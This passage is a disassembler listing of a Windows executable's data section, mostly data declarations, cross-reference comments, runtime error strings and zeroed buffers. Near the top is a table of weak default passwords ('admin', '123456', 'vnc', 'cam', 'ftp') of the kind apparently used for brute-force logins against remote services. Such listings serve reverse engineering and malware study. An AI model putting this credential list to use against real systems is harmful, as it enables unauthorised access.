db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm',0
align 4
off_420F34 dd offset a123 ; DATA XREF: .text:0040D208�r
; "123"
dd offset a1234 ; "1234"
dd offset a12345 ; "12345"
dd offset a123456 ; "123456"
dd offset aAbc ; "abc"
dd offset aTest ; "test"
dd offset aCam ; "cam"
dd offset aVnc ; "vnc"
dd offset aPassword_0 ; "password"
dd offset aFtp ; "ftp"
dd offset aServer_1 ; "server"
dd offset aAdmin ; "admin"
dd offset aPass ; "pass"
dd offset aAbc123 ; "abc123"
dword_420F6C dd 66B5217h, 7584E23h, 3 dup(0) ; DATA XREF: sub_40CC65+30�o
off_420F80 dd offset dword_4C5EE0 ; DATA XREF: sub_4012BA+113�w
; sub_4012BA:loc_4013D5�o ...
dword_420F84 dd 0 ; DATA XREF: sub_4012BA+10B�w
; sub_40151D+10B�w
dd offset dword_4C5EE0
dd 101h
dword_420F90 dd 2 dup(0) ; DATA XREF: sub_40DABB+71�o
dd 1000h, 0
dword_420FA0 dd 3 dup(0) ; DATA XREF: sub_40FA2B+53�o
dd 2, 1, 3 dup(0)
dword_420FC0 dd 3 dup(0) ; DATA XREF: sub_40FA2B+5B�o
dd 2 dup(2), 7 dup(0)
dword_420FF0 dd 84h dup(0) ; DATA XREF: sub_40DABB+9A�o
dword_421200 dd 1 ; DATA XREF: sub_40DABB+67�o
; sub_40E043+4�w ...
align 10h
dd 9875h, 9873h
off_421218 dd offset sub_40E2CA ; DATA XREF: sub_40DD0D:loc_40DD3D�r
dd offset nullsub_3
dd offset nullsub_3
align 10h
dword_421230 dd 19930520h, 3 dup(0) ; DATA XREF: sub_40F211+2�o
; sub_40F21A+2�o
dd offset sub_41437B
align 10h
off_421250 dd offset sub_40DE75 ; DATA XREF: sub_40F82D+1C�r
dword_421254 dd 2 ; DATA XREF: sub_4144B2+50�r
; sub_414629+E�r ...
off_421258 dd offset aNull_0 ; DATA XREF: sub_40FBCF:loc_40FF95�r
; sub_40FBCF+4E4�r
; "(null)"
off_42125C dd offset aNull ; DATA XREF: sub_40FBCF+2AC�r
; "(null)"
dword_421260 dd 0FFFFFFFFh, 0A80h ; DATA XREF: sub_40D9DD:loc_40DA60�o
; sub_40FA2B:loc_40FAE8�o
byte_421268 db 1 ; DATA XREF: sub_411824+123�r
db 2, 4, 8
align 10h
dword_421270 dd 3A4h ; DATA XREF: sub_411824:loc_4118A2�r
dword_421274 dd 82798260h ; DATA XREF: sub_411824+15F�r
dd 21h, 0
dword_421280 dd 0DFA6h ; DATA XREF: sub_411824+103�r
align 8
dd 0A5A1h, 0
dd 0FCE09F81h, 0
dd 0FC807E40h, 0
dd 3A8h, 0A3DAA3C1h, 20h, 5 dup(0)
dd 0FE81h, 0
dd 0FE40h, 0
dd 3B5h, 0A3DAA3C1h, 20h, 5 dup(0)
dd 0FE81h, 0
dd 0FE41h, 0
dd 3B6h, 0A2E4A2CFh, 0A2E5001Ah, 5BA2E8h, 4 dup(0)
dd 0FE81h, 0
dd 0FEA17E40h, 0
dd 551h, 0DA5EDA51h, 0DA5F0020h, 32DA6Ah, 4 dup(0)
dd 0DED8D381h, 0F9E0h, 0FE817E31h, 0
dword_421360 dd 0BB40E64Eh ; DATA XREF: sub_40E1DE+6�r
; sub_40FBCF+9�r ...
off_421364 dd offset sub_411F45 ; DATA XREF: sub_40E292+5�w
; sub_40FBCF+43E�r
off_421368 dd offset sub_411C0B ; DATA XREF: sub_40E292+A�w
; sub_40FBCF+46A�r
off_42136C dd offset sub_411C70 ; DATA XREF: sub_40E292+14�w
; sub_41095C+495�r
off_421370 dd offset sub_411BB3 ; DATA XREF: sub_40E292+1E�w
; sub_40FBCF+459�r
off_421374 dd offset sub_411C56 ; DATA XREF: sub_40E292+28�w
off_421378 dd offset sub_411F45 ; DATA XREF: sub_40E292+32�w
dd 10h
dword_421380 dd 1 ; DATA XREF: sub_412BBA:loc_412BC5�r
dword_421384 dd 16h ; DATA XREF: sub_412BBA:loc_412BE9�r
dd 2 dup(2), 3, 2, 4, 18h, 5, 0Dh, 6, 9, 7, 0Ch, 8, 0Ch
dd 9, 0Ch, 0Ah, 7, 0Bh, 8, 0Ch, 16h, 0Dh, 16h, 0Fh, 2
dd 10h, 0Dh, 11h, 2 dup(12h), 2, 21h, 0Dh, 35h, 2, 41h
dd 0Dh, 43h, 2, 50h, 11h, 52h, 0Dh, 53h, 0Dh, 57h, 16h
dd 59h, 0Bh, 6Ch, 0Dh, 6Dh, 20h, 70h, 1Ch, 72h, 9, 6, 16h
dd 80h, 0Ah, 81h, 0Ah, 82h, 9, 83h, 16h, 84h, 0Dh, 91h
dd 29h, 9Eh, 0Dh, 0A1h, 2, 0A4h, 0Bh, 0A7h, 0Dh, 0B7h
dd 11h, 0CEh, 2, 0D7h, 0Bh, 718h, 0Ch
dword_4214E8 dd 1 ; DATA XREF: sub_40EB9E+18�r
off_4214EC dd offset word_41BD02 ; DATA XREF: sub_40EB9E:loc_40EBE7�r
; sub_40EB9E:loc_40EBF6�r ...
dd offset dword_41BF08+2
dword_4214F4 dd 1 ; DATA XREF: sub_40EB9E+36�r
; sub_410914�r ...
byte_4214F8 db 2Eh ; DATA XREF: sub_41095C:loc_410CB1�r
; sub_41095C+373�r ...
align 4
dd 1, 41437Bh, 413EDFh
off_421508 dd offset sub_413EDF ; DATA XREF: sub_413F0C+C�r
align 10h
off_421510 dd offset sub_416305 ; DATA XREF: sub_413F8C+11D�r
; sub_413F8C+1D8�r ...
dword_421514 dd 173Fh ; DATA XREF: sub_4142AA+D�r
dword_421518 dd 1B3Fh ; DATA XREF: sub_4143E1+D�r
align 10h
dword_421520 dd 2 ; DATA XREF: sub_4144B2:loc_4144D0�r
; sub_4144B2+32�r
off_421524 dd offset aR6002FloatingP ; DATA XREF: sub_4144B2+DE�r
; sub_4144B2+11B�r ...
; "R6002\r\n- floating point not loaded\r\n"
dd 8, 41C4ECh, 9, 41C4C0h, 0Ah, 41C428h, 10h, 41C3FCh
dd 11h, 41C3CCh, 12h, 41C3A8h, 13h, 41C37Ch, 18h, 41C344h
dd 19h, 41C31Ch, 1Ah, 41C2E4h, 1Bh, 41C2ACh, 1Ch, 41C284h
dd 78h, 41C274h, 79h, 41C264h, 7Ah, 41C254h, 0FCh, 41A920h
dd 0FFh, 41C244h
dword_4215B0 dd 0C0000005h, 0Bh, 0 ; DATA XREF: sub_414662+C�o
; sub_417813+6�o
dd 0C000001Dh, 4, 0
dd 0C0000096h, 4, 0
db 8Dh, 0
dw 0C000h
dd 8, 0
dd 0C000008Eh, 8, 0
dd 0C000008Fh, 8, 0
db 90h
db 2 dup(0), 0C0h
dd 8, 0
dd 0C0000091h, 8, 0
dd 0C0000092h, 8, 0
dd 0C0000093h, 8, 0
dword_421628 dd 3 ; DATA XREF: sub_414662+84�r
; sub_41784C+C4�r
dword_42162C dd 7 ; DATA XREF: sub_414662+89�r
; sub_41784C+C9�r
dword_421630 dd 0Ah ; DATA XREF: sub_414662+6�r sub_417813�r
dword_421634 dd 8Ch ; DATA XREF: sub_414662+B2�r
; sub_414662+BA�w ...
dword_421638 dd 400h, 0FFFFFC01h, 35h, 0Bh, 40h, 3FFh ; DATA XREF: sub_41577E�o
dword_421650 dd 80h, 0FFFFFF81h, 18h, 8, 20h, 7Fh ; DATA XREF: sub_415794�o
dword_421668 dd 2694h ; DATA XREF: sub_4168C2+3�r
; sub_416914+60�r
align 10h
dword_421670 dd 14h ; DATA XREF: sub_416822:loc_41682A�r
off_421674 dd offset aExp ; DATA XREF: sub_416822:loc_41689C�r
; "exp"
; ---------------------------------------------------------------------------
sbb eax, 20000000h
retn 41h
; ---------------------------------------------------------------------------
dd 1Ah, 41C224h, 1Bh, 41C228h, 1Fh, 41C800h, 13h, 41C7F8h
dd 21h, 41C7F0h, 0Eh, 41C7E8h, 0Dh, 41C7E0h, 0Fh, 41C1E8h
dd 10h, 41C7D8h, 5, 41C7D0h, 1Eh, 41C7CCh, 12h, 41C7C8h
dd 20h, 41C7C4h, 0Ch, 41C1F0h, 0Bh, 41C1F8h, 15h, 41C7BCh
dd 1Ch, 41C200h, 19h, 41C7B4h, 11h, 41C7ACh, 18h, 41C7A4h
dd 16h, 41C79Ch, 17h, 41C794h, 22h, 41C790h, 23h, 41C78Ch
dd 24h, 41C788h, 25h, 41C780h, 26h, 41C774h
dbl_421758 dq 1.797693134862316e308 ; DATA XREF: sub_4165AD+BC�r
; sub_4165AD:loc_41669B�r ...
dd 0
dd 0FFF80000h
dbl_421768 dq 1.797693134862316e308 ; DATA XREF: sub_4165AD+93�r
; sub_4165AD:loc_416671�r ...
dd 0
dd 100000h, 0
dd 80000000h
tbyte_421780 dt 2.3562723457267347066e313 ; DATA XREF: sub_416B63+B�r
; sub_416B63+1E�r
align 4
tbyte_42178C dt 1.9149954921904370718e-1233 ; DATA XREF: sub_416B63+31�r
align 4
dword_421798 dd 2 dup(0) ; DATA XREF: sub_417BAD+F�o
dd 4002A000h, 2 dup(0)
dd 4005C800h, 2 dup(0)
dd 4008FA00h, 2 dup(0)
dd 400C9C40h, 2 dup(0)
; ---------------------------------------------------------------------------
push eax
retn
; ---------------------------------------------------------------------------
dw 400Fh
dd 2 dup(0)
dd 4012F424h, 0
dd 80000000h, 40169896h, 0
dd 20000000h, 4019BEBCh, 0
dd 0C9BF0400h, 40348E1Bh, 0A1000000h, 1BCECCEDh, 404ED3C2h
dd 0B59EF020h, 0ADA82B70h, 40699DC5h, 25FD5DD0h, 4F8E1AE5h
dd 4083EB19h, 95D79671h, 8D050E43h, 409EAF29h, 44A0BFF9h
dd 8F1281EDh, 40B98281h, 0A6D53CBFh, 1F49FFCFh, 40D3C278h
dd 8CE0C66Fh, 47C980E9h, 41A893BAh, 556B85BCh, 0F78D3927h
dd 427CE070h, 0DE8EDDBCh, 0EBFB9DF9h, 4351AA7Eh, 0E376E6A1h
dd 2F29F2CCh, 44268184h, 0AA171028h, 0E310AEF8h, 44FAC4C5h
dd 0F3D4A7EBh, 4AE1EBF7h, 45CF957Ah, 91C7CC65h, 0A0AEA60Eh
dd 46A3E319h, 0C17650Dh, 75868175h, 4D48C976h, 0A7E44258h
dd 353B3993h, 53EDB2B8h, 5DE5A74Dh, 3B5DC53Dh, 5A929E8Bh
dd 0F0A65DFFh, 54C020A1h, 61378CA5h, 5A8BFDD1h, 5D25D88Bh
dd 67DBF989h, 0F3F895AAh, 0C8A2BF27h, 6E80DD5Dh, 979BC94Ch
dd 52028A20h, 7525C460h, 0
dword_4218F8 dd 0CCCDCCCDh, 0CCCCCCCCh, 3FFBCCCCh, 0D70A3D71h, 0A3D70A3h
; DATA XREF: sub_417BAD+26�o
dd 3FF8A3D7h, 0DF3B645Ah, 6E978D4Fh, 3FF58312h, 652CD3C3h
dd 1758E219h, 3FF1D1B7h, 84230FD0h, 0AC471B47h, 3FEEA7C5h
dd 69B6A640h, 0BD05AF6Ch, 3FEB8637h, 42BC3D33h, 94D5E57Ah
dd 3FE7D6BFh, 0CEFDFDC2h, 77118461h, 3FE4ABCCh, 0E15B4C2Fh
dd 94BEC44Dh, 3FC9E695h, 3B53C492h, 14CD4475h, 3FAF9ABEh
dd 94BA67DEh, 1EAD4539h, 3F94CFB1h, 0E2C62324h, 313BBABCh
dd 3F7A8B61h, 0C1595561h, 7C53B17Eh, 3F5FBB12h, 8D2FEED7h
dd 8592BE06h, 3F44FB15h, 0E9A53F24h, 0EA27A539h, 3F2AA87Fh
dd 0E4A1AC7Dh, 467C64BCh, 3E55DDD0h, 0CC067B63h, 83775423h
dd 3D8191FFh, 193AFA91h, 4325637Ah, 3CACC031h, 38D18921h
dd 0B8974782h, 3BD7FD00h, 85888DCh, 0E3E8B11Bh, 3B03A686h
dd 424584C6h, 7599B607h, 3A2EDB37h, 0D21C7133h, 0EE32DB23h
dd 395A9049h, 0C0BE87A6h, 82A5DA57h, 32B5A2A6h, 11B268E2h
dd 449F52A7h, 2C10B759h, 2DE44925h, 534F3436h, 256BCEAEh
dd 0A404598Fh, 7DC2DEC0h, 1EC6E8FBh, 5A88E79Eh, 0BF3C9157h
dd 18228350h, 62654B4Eh, 0AF8F83FDh, 117D9406h, 9FDE2DE4h
dd 4C8D2CEh, 0AD8A6DDh
off_421A54 dd offset off_41C8DC ; DATA XREF: .text:off_41C900�o
; .text:0041CBB0�o
dd 0
a_?avexception@ db '.?AVexception@@',0
off_421A6C dd offset off_41C8DC ; DATA XREF: .text:off_41C918�o
; .text:0041C958�o ...
dd 0
a_?avlogic_erro db '.?AVlogic_error@std@@',0
align 4
off_421A8C dd offset off_41C8DC ; DATA XREF: .text:off_41C960�o
; .text:0041C9A4�o ...
dd 0
a_?avlength_err db '.?AVlength_error@std@@',0
align 4
off_421AAC dd offset off_41C8DC ; DATA XREF: .text:off_41C9AC�o
; .text:0041C9F0�o ...
dd 0
a_?avout_of_ran db '.?AVout_of_range@std@@',0
align 4
off_421ACC dd offset off_41C8DC ; DATA XREF: .text:off_41C9F8�o
; .text:0041CA34�o
dd 0
a_?avtype_info@ db '.?AVtype_info@@',0
dd 7 dup(0)
dword_421B00 dd 40h dup(0) ; DATA XREF: sub_401073+4C�o
; sub_401179+65�o
dword_421C00 dd 40h dup(0) ; DATA XREF: sub_4013E5+63�o
dword_421D00 dd 42h dup(0) ; DATA XREF: sub_404BAB+6D�o
dword_421E08 dd 0 ; DATA XREF: sub_4056A2+188�o
; sub_40A83B+3�o ...
dd 0FFh dup(0)
dword_422208 dd 0 ; DATA XREF: sub_40A83B+4C�w
; sub_40A920+48�w ...
dword_42220C dd 0 ; DATA XREF: sub_40752D+233�w
; sub_40A83B+3E�w ...
dword_422210 dd 0 ; DATA XREF: sub_40A83B+45�w
; sub_40A920+3E�r ...
dword_422214 dd 0 ; DATA XREF: sub_4077DC+7C�w
; sub_40A83B+60�w ...
dword_422218 dd 0 ; DATA XREF: sub_40A920+7B�r
; sub_40AADD+2A�w
dword_42221C dd 0 ; DATA XREF: sub_40198E+1132�w
; sub_40198E+1364�w ...
byte_422220 db 0 ; DATA XREF: sub_40A83B:loc_40A894�w
; sub_40A920+73�w ...
align 4
dd 1B87h dup(0)
db 2 dup(0)
word_429042 dw 0 ; DATA XREF: .text:0041F9B5�o
dd 1FD71h dup(0)
dword_4A8608 dd 100h dup(0) ; DATA XREF: sub_40A83B+13�o
; sub_40A8A6+6E�o ...
dword_4A8A08 dd 0 ; DATA XREF: sub_40AA32+16�o
dword_4A8A0C dd 3112h dup(0) ; DATA XREF: sub_40A9E5+3D�o
db 0
byte_4B4E55 db 3 dup(0) ; DATA XREF: .text:off_41B414�o
dd 0DE4h dup(0)
dword_4B85E8 dd 0 ; DATA XREF: sub_404901+B4�w
; sub_404BAB:loc_4051C9�o
dd 3Fh dup(0)
dword_4B86E8 dd 20h dup(0) ; DATA XREF: sub_404BAB+4EE�o
; sub_404BAB+62E�o
dword_4B8768 dd 0 ; DATA XREF: sub_404BAB+50D�w
; sub_404BAB+5AC�w ...
dword_4B876C dd 10h dup(0) ; DATA XREF: sub_404BAB+508�o
; sub_404BAB+5A7�o ...
dword_4B87AC dd 25h dup(0) ; DATA XREF: sub_404BAB+51E�o
dword_4B8840 dd 0 ; DATA XREF: sub_404BAB+52C�w
align 10h
dword_4B8850 dd 0 ; DATA XREF: sub_40198E+943�o
; sub_40198E+9B4�r ...
dd 5 dup(0)
dword_4B8868 dd 0 ; DATA XREF: sub_40198E+9A4�r
dd 2D9h dup(0)
byte_4B93D0 db 0 ; DATA XREF: sub_404901+136�o
; sub_404901+298�w ...
align 4
dd 0FFh dup(0)
dword_4B97D0 dd 0 ; DATA XREF: sub_404BAB:loc_4050E0�r
align 8
dword_4B97D8 dd 40h dup(0) ; DATA XREF: sub_40198E+297�o
dword_4B98D8 dd 0 ; DATA XREF: sub_40A610+32�r
dword_4B98DC dd 0 ; DATA XREF: sub_404BAB+20�w
dword_4B98E0 dd 0FC0h dup(0) ; DATA XREF: sub_401648+17�o
; sub_40198E+1426�o ...
dword_4BD7E0 dd 40h dup(0) ; DATA XREF: sub_401648+12�o
dword_4BD8E0 dd 0 ; DATA XREF: sub_40198E+144E�o
; sub_404BAB+43�w ...
dword_4BD8E4 dd 0 ; DATA XREF: sub_404BAB+1BB�r
align 10h
dword_4BD8F0 dd 0 ; DATA XREF: sub_40198E+2E06�w
; sub_404BAB+55F�w
dd 1001h dup(0)
dword_4C18F8 dd 20h dup(0) ; DATA XREF: sub_4051F8+4�o
; sub_40554F+13�o
dword_4C1978 dd 0Eh dup(0) ; DATA XREF: sub_4051F8+13�o
; sub_405B42+10�o
dword_4C19B0 dd 0 ; DATA XREF: sub_406140+28�r
; sub_406425+175�w
align 8
byte_4C19B8 db 0 ; DATA XREF: sub_4060F4+21�o
; sub_4060F4+3F�r
align 4
dd 0A00h dup(0)
dword_4C41BC dd 0 ; DATA XREF: sub_406079+1�r
; sub_406193+7�r ...
byte_4C41C0 db 0 ; DATA XREF: sub_4065B2+30�o
; sub_4065B2:loc_406616�w ...
align 4
dd 0FFh dup(0)
dword_4C45C0 dd 0 ; DATA XREF: sub_406193+43�r
; sub_406425+126�w ...
dword_4C45C4 dd 0 ; DATA XREF: sub_406079+42�r
; sub_406193+65�r ...
dword_4C45C8 dd 0 ; DATA XREF: sub_406193+18�r
; sub_406425+114�w ...
dword_4C45CC dd 0 ; DATA XREF: sub_406425+CC�w
; sub_406425+12D�r ...
dword_4C45D0 dd 0 ; DATA XREF: sub_405FD6+9�r
; sub_406425+DE�w ...
dword_4C45D4 dd 0 ; DATA XREF: sub_406079+1F�r
; sub_406079+32�r ...
dword_4C45D8 dd 0 ; DATA XREF: sub_405FD6�r sub_4065B2+4�w ...
dword_4C45DC dd 0 ; DATA XREF: sub_405FD6:loc_405FEA�r
; sub_406425+12�w ...
dword_4C45E0 dd 0 ; DATA XREF: sub_405FD6:loc_405FFD�r
; sub_406425+C�w ...
dword_4C45E4 dd 0 ; DATA XREF: sub_40600B+66�w
dword_4C45E8 dd 0 ; DATA XREF: sub_4060C7+7�w
; sub_4060F4+5�r ...
dword_4C45EC dd 0 ; DATA XREF: sub_4060C7�w sub_4060F4�r ...
dword_4C45F0 dd 0 ; DATA XREF: sub_4060C7+25�w
; sub_4060F4+D�r
dword_4C45F4 dd 0 ; DATA XREF: sub_40479E+141�r
; sub_4077DC+1B6�r ...
dword_4C45F8 dd 0 ; DATA XREF: sub_40198E+1A5B�r
; sub_40198E+2A83�r ...
dword_4C45FC dd 0 ; DATA XREF: sub_407D3E+987�w
; sub_407D3E+9EF�r
dword_4C4600 dd 0 ; DATA XREF: sub_407D3E+865�w
; sub_407D3E+8B8�r
dword_4C4604 dd 0 ; DATA XREF: sub_407D3E+557�w
; sub_407D3E+6DB�r
dword_4C4608 dd 0 ; DATA XREF: sub_404BAB+542�r
; sub_407D3E+80A�w ...
dword_4C460C dd 0 ; DATA XREF: sub_407D3E+8C�w
; sub_407D3E+E2�r
dword_4C4610 dd 0 ; DATA XREF: sub_407D3E+1A6�w
; sub_407D3E+1E2�r
dword_4C4614 dd 0 ; DATA XREF: sub_407D3E+172�w
; sub_407D3E+1C2�r
dword_4C4618 dd 0 ; DATA XREF: sub_407D3E+63B�w
; sub_407D3E+783�r
dword_4C461C dd 0 ; DATA XREF: sub_407D3E+4A6�w
; sub_407D3E+4F4�r
dword_4C4620 dd 0 ; DATA XREF: sub_407D3E+B08�w
dword_4C4624 dd 0 ; DATA XREF: sub_4077DC+B7�r
; sub_4077DC+376�r ...
dword_4C4628 dd 0 ; DATA XREF: sub_407D3E+84B�w
; sub_407D3E+87F�r
dword_4C462C dd 0 ; DATA XREF: sub_407D3E+18C�w
; sub_407D3E+1D2�r
dword_4C4630 dd 0 ; DATA XREF: sub_407D3E+206�w
; sub_407D3E+227�r
dword_4C4634 dd 0 ; DATA XREF: sub_407D3E+58�w
; sub_407D3E+CA�r ...
dword_4C4638 dd 0 ; DATA XREF: sub_407D3E+96D�w
; sub_407D3E+9DF�r
dword_4C463C dd 0 ; DATA XREF: sub_407D3E+5BF�w
; sub_407D3E+72F�r ...
dword_4C4640 dd 0 ; DATA XREF: sub_407D3E+220�w
; sub_407D3E+23C�r
dword_4C4644 dd 0 ; DATA XREF: sub_407D3E+BAC�w
; sub_407D3E+BE7�r
dword_4C4648 dd 0 ; DATA XREF: sub_407D3E+2DC�w
; sub_407D3E+30D�r
dword_4C464C dd 0 ; DATA XREF: sub_4077DC+138�r
; sub_407D3E+675�w ...
dword_4C4650 dd 0 ; DATA XREF: sub_407D3E+22D�w
dword_4C4654 dd 0 ; DATA XREF: sub_407D3E+BE0�w
dword_4C4658 dd 0 ; DATA XREF: sub_407D3E+994�w
; sub_407D3E+9F7�r
dword_4C465C dd 0 ; DATA XREF: sub_407D3E+627�w
; sub_407D3E+773�r
dword_4C4660 dd 0 ; DATA XREF: sub_407D3E+B62�w
dword_4C4664 dd 0 ; DATA XREF: sub_407D3E+31�w
; sub_407D3E+AD�r
dword_4C4668 dd 0 ; DATA XREF: sub_407D3E+AFB�w
; sub_407D3E+B17�r
dword_4C466C dd 0 ; DATA XREF: sub_407D3E+9AE�w
; sub_407D3E+A07�r
dword_4C4670 dd 0 ; DATA XREF: sub_407D3E+2CF�w
; sub_407D3E+305�r
dword_4C4674 dd 0 ; DATA XREF: sub_407D3E+946�w
; sub_407D3E+9C2�r
dword_4C4678 dd 0 ; DATA XREF: sub_407D3E+9BB�w
; sub_407D3E+A0F�r
dword_4C467C dd 0 ; DATA XREF: sub_407D3E+3E�w
; sub_407D3E+BA�r ...
dword_4C4680 dd 0 ; DATA XREF: sub_407D3E+3B2�w
; sub_407D3E+3F8�r
dword_4C4684 dd 0 ; DATA XREF: sub_407D3E+17F�w
; sub_407D3E+1CA�r
dword_4C4688 dd 0 ; DATA XREF: sub_405C00+1B�r
; sub_407D3E+72�w ...
dword_4C468C dd 0 ; DATA XREF: sub_407D3E+8E7�w
; sub_407D3E:loc_40865B�w
dword_4C4690 dd 0 ; DATA XREF: sub_4077DC+5C�r
; sub_407D3E+5A5�w ...
dword_4C4694 dd 0 ; DATA XREF: sub_407D3E+953�w
; sub_407D3E+9CF�r
dword_4C4698 dd 0 ; DATA XREF: sub_407D3E+858�w
; sub_407D3E+8B0�r
dword_4C469C dd 0 ; DATA XREF: sub_407D3E+A97�w
; sub_407D3E+A9E�r
dword_4C46A0 dd 0 ; DATA XREF: sub_404BAB+AC�r
; sub_407D3E+54A�w ...
dword_4C46A4 dd 0 ; DATA XREF: sub_407D3E+9C8�w
dword_4C46A8 dd 0 ; DATA XREF: sub_407D3E+65�w
dword_4C46AC dd 0 ; DATA XREF: sub_407D3E+682�w
; sub_407D3E+7AB�r
dword_4C46B0 dd 0 ; DATA XREF: sub_407D3E+99�w
; sub_407D3E+EA�r ...
dword_4C46B4 dd 0 ; DATA XREF: sub_407D3E+BC6�w
; sub_407D3E+BF7�r
dword_4C46B8 dd 0 ; DATA XREF: sub_407D3E+824�w
; sub_407D3E+894�r
dword_4C46BC dd 0 ; DATA XREF: sub_407D3E+4C0�w
; sub_407D3E+504�r
dword_4C46C0 dd 0 ; DATA XREF: sub_407D3E+3BF�w
; sub_407D3E+400�r
dword_4C46C4 dd 0 ; DATA XREF: sub_407D3E+83E�w
; sub_407D3E+8A4�r
dword_4C46C8 dd 0 ; DATA XREF: sub_407D3E+97A�w
; sub_407D3E+9E7�r
dword_4C46CC dd 0 ; DATA XREF: sub_407D3E+2E9�w
; sub_407D3E+315�r
dword_4C46D0 dd 0 ; DATA XREF: sub_407D3E+6C3�w
dword_4C46D4 dd 0 ; DATA XREF: sub_407D3E+A6�w
; sub_407D3E+F2�r
dword_4C46D8 dd 0 ; DATA XREF: sub_407D3E+2C2�w
; sub_407D3E+2FD�r
dword_4C46DC dd 0 ; DATA XREF: sub_407D3E+4B�w
; sub_407D3E+C2�r ...
dd 0
dword_4C46E4 dd 0 ; DATA XREF: sub_4077DC+110�r
; sub_407D3E+571�w
dword_4C46E8 dd 0 ; DATA XREF: sub_407D3E+165�w
; sub_407D3E+1BA�r
dword_4C46EC dd 0 ; DATA XREF: sub_407D3E+885�w
dword_4C46F0 dd 0 ; DATA XREF: sub_407D3E+6A9�w
; sub_407D3E+7C3�r ...
dword_4C46F4 dd 0 ; DATA XREF: sub_407D3E+A5A�w
dword_4C46F8 dd 0 ; DATA XREF: sub_407D3E+353�w
; sub_4093BC+55�r
dword_4C46FC dd 0 ; DATA XREF: sub_407D3E+AA4�w
dword_4C4700 dd 0 ; DATA XREF: sub_407D3E+48C�w
; sub_407D3E+4E4�r
dword_4C4704 dd 0 ; DATA XREF: sub_407D3E+5D9�w
; sub_407D3E+747�r ...
dword_4C4708 dd 0 ; DATA XREF: sub_407D3E+47F�w
; sub_407D3E+4DC�r
dword_4C470C dd 0 ; DATA XREF: sub_407D3E+4CD�w
dword_4C4710 dd 0 ; DATA XREF: sub_40198E+1A82�r
; sub_40198E+1B6F�r ...
align 8
dword_4C4718 dd 0 ; DATA XREF: sub_407D3E+4B3�w
; sub_407D3E+4FC�r
dword_4C471C dd 0 ; DATA XREF: sub_407D3E+564�w
; sub_407D3E+6E7�r
dword_4C4720 dd 0 ; DATA XREF: sub_407D3E+428�w
dword_4C4724 dd 0 ; DATA XREF: sub_40479E+7F�r
; sub_406C59+A5�r ...
dword_4C4728 dd 0 ; DATA XREF: sub_407D3E+1B3�w
dword_4C472C dd 0 ; DATA XREF: sub_407D3E+7F�w
; sub_407D3E+DA�r
dword_4C4730 dd 0 ; DATA XREF: sub_407D3E+AE1�w
; sub_407D3E+B02�r
dword_4C4734 dd 0 ; DATA XREF: sub_4077DC+F4�r
; sub_407D3E+65B�w ...
dword_4C4738 dd 0 ; DATA XREF: sub_407D3E+B3�w
dword_4C473C dd 0 ; DATA XREF: sub_407D3E+872�w
; sub_407D3E+8C0�r
dword_4C4740 dd 0 ; DATA XREF: sub_407D3E+BD3�w
; sub_407D3E+BFF�r
dword_4C4744 dd 0 ; DATA XREF: sub_407D3E+499�w
; sub_407D3E+4EC�r
dword_4C4748 dd 0 ; DATA XREF: sub_4072DA+9D�r
; sub_4077DC:loc_407BB0�r ...
dword_4C474C dd 0 ; DATA XREF: sub_407D3E+37E�w
; sub_407D3E+3D3�r
dword_4C4750 dd 0 ; DATA XREF: sub_407D3E+158�w
; sub_407D3E+1AD�r
dword_4C4754 dd 0 ; DATA XREF: sub_407D3E+398�w
; sub_407D3E+3E8�r
dword_4C4758 dd 0 ; DATA XREF: sub_407D3E+9A1�w
; sub_407D3E+9FF�r
dword_4C475C dd 0 ; DATA XREF: sub_407D3E+3CC�w
; sub_407D3E+408�r
dword_4C4760 dd 0 ; DATA XREF: sub_407D3E+60D�w
; sub_40AC0E+20�r
dword_4C4764 dd 0 ; DATA XREF: sub_407D3E+57E�w
; sub_407D3E+6F3�r ...
dword_4C4768 dd 0 ; DATA XREF: sub_4077DC+89�r
; sub_407D3E+64E�w ...
dword_4C476C dd 0 ; DATA XREF: sub_407D3E+2F6�w
dword_4C4770 dd 0 ; DATA XREF: sub_407D3E+3A5�w
; sub_407D3E+3F0�r
dword_4C4774 dd 0 ; DATA XREF: sub_407D3E+A4D�w
; sub_407D3E+A54�r
dd 0
dword_4C477C dd 0 ; DATA XREF: sub_407D3E+B9F�w
; sub_407D3E+BDA�r
dword_4C4780 dd 0 ; DATA XREF: sub_407D3E+6B6�w
; sub_407D3E+7CB�r
dword_4C4784 dd 0 ; DATA XREF: sub_407D3E+600�w
; sub_407D3E+763�r
dword_4C4788 dd 0 ; DATA XREF: sub_407D3E+3D9�w
dword_4C478C dd 0 ; DATA XREF: sub_407D3E+112�w
dword_4C4790 dd 0 ; DATA XREF: sub_407D3E+960�w
; sub_407D3E+9D7�r
dword_4C4794 dd 0 ; DATA XREF: sub_407D3E+BB9�w
; sub_407D3E+BEF�r
dword_4C4798 dd 0 ; DATA XREF: sub_407D3E+B55�w
; sub_407D3E+B5C�r
dword_4C479C dd 0 ; DATA XREF: sub_40479E+8D�r
; sub_4073C5+151�r ...
dword_4C47A0 dd 0 ; DATA XREF: sub_407D3E+472�w
; sub_407D3E+4D4�r
dword_4C47A4 dd 0 ; DATA XREF: sub_407D3E+69C�w
; sub_407D3E+7BB�r ...
dword_4C47A8 dd 0 ; DATA XREF: sub_404BAB+394�r
; sub_404BAB:loc_4051E9�r ...
dword_4C47AC dd 0 ; DATA XREF: sub_407D3E+346�w
; sub_407D3E+35A�r ...
dword_4C47B0 dd 0 ; DATA XREF: sub_407D3E+213�w
; sub_407D3E+234�r
dword_4C47B4 dd 0 ; DATA XREF: sub_4077DC+9E�r
; sub_407D3E+668�w ...
dword_4C47B8 dd 0 ; DATA XREF: sub_407D3E+5F3�w
; sub_407D3E+75B�r ...
dword_4C47BC dd 0 ; DATA XREF: sub_407D3E+2B5�w
; sub_407D3E+2F0�r
dword_4C47C0 dd 0 ; DATA XREF: sub_407D3E+199�w
